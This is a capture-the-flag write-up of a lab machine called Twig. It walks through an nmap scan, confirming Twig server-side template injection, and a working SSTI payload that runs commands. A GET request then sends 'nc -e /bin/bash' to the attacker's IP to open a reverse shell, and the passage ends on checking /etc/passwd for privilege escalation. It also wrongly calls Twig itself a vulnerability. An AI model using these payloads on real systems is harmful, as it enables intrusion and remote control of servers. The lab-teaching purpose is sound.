HackerEnv Target: twig #3 Write Up

Nouf

3 min readNov 1, 2020

And I back with a new beautiful platform.

Let’s do Twig Machine in this write up.

As always, started by nmap

nmap -sT -sT -A -p- -T5 10.0.101.1

We only got one opened port! let’s explore that and dig into it

we got a form, I submitted a normal request and the form returned my name in the response.

let’s read source code to collect more information. No thing is attractive in the source code, except this comment

By googling Twig, you will understand that Twig is a Server Side Template Injection.

This vulnerability allows attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values.

Let’s try and see if I can execute or not, I will submit 4*4 and see if it will execute the multiplication and return 16 or not

I wrote {{4*4}} instead of my name

I intercepted the request by Burp Suite and sent it to the Repeater, and Bingoo 16 is there

so the vulnerability exists, let’s take advantage of it, I sent the below in the user field to know the id

{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“id”)}}

let’s do a connection to explore the machine more,

I opened a listener from my machine by

nc -lvnp 8000

8000 is the port that I am going to listen to, you can choose any number

I connected to it by sending nc+-e+/bin/bash+ MY IP+ PORT as a user

GET /?User={{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“nc+-e+/bin/bash+10.10.1.22+8000”)}}&PhoneNumber=1&submit=Submit

Put your IP and port instead of mine

After having the connection, I explored the machine by

ls -l

and found the first flag

I explored the machine and there was not anything interesting, so privilege escalation came to my mind, I went to /etc/passwd to see if I could write on it